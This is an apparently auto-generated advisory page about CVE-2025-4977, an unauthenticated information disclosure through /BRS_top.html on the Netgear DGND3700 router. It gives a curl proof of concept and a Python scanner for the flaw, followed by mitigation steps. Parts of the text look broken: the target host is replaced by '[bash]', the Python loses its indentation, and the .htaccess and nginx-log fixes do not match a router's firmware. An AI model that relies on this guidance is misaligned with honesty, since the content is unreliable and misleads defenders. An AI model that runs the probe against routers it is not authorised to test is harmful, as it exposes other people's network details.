Netgear DGND3700, Information Disclosure, CVE-2025-4977 (Medium)

Listen to this Post

How CVE-2025-4977 Works

This vulnerability in Netgear DGND3700 firmware version 1.1.00.15_1.00.15NA allows remote attackers to access sensitive data via /BRS_top.html. The flaw occurs due to improper access controls, exposing internal network details without authentication. Attackers send crafted HTTP requests to the vulnerable endpoint, triggering unintended data leakage. The CVSS 4.0 vector (AV:N/AC:L/PR:N/UI:N) confirms network-based exploitation with low attack complexity. VulDB reports this as a MEDIUM-severity issue (CVSS-B 6.9) due to limited impact on confidentiality (VC:L) without system compromise.

DailyCVE Form

Platform: Netgear DGND3700
Version: 1.1.00.15_1.00.15NA
Vulnerability: Information disclosure
Severity: Medium
Date: 06/12/2025

Prediction: Patch by Q3 2025

What Undercode Say:

Exploitation

1. Curl PoC:

curl -X GET http://[bash]/BRS_top.html -v

2. Python Scanner:

import requests
response = requests.get("http://[bash]/BRS_top.html")
if "internal" in response.text:
print("[+] Vulnerable to CVE-2025-4977")

Mitigation

  1. Temporary Fix: Block external access to `/BRS_top.html` via .htaccess:
    <Files "BRS_top.html">
    Require all denied
    </Files>
    

2. Log Monitoring: Detect exploitation attempts:

grep "GET /BRS_top.html" /var/log/nginx/access.log

Analysis

  • Impact: Exposes router configs, but no RCE.
  • Detection: Check firmware version:
    cat /etc/version | grep "1.1.00.15"
    
  • Patch Watch: Monitor Netgear’s security advisories for updates.

Network Hardening

iptables -A INPUT -p tcp --dport 80 -m string --string "BRS_top.html" --algo bm -j DROP

References

  • VulDB Entry
  • Netgear Security Bulletin: `SB2025-4977` (Pending)

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top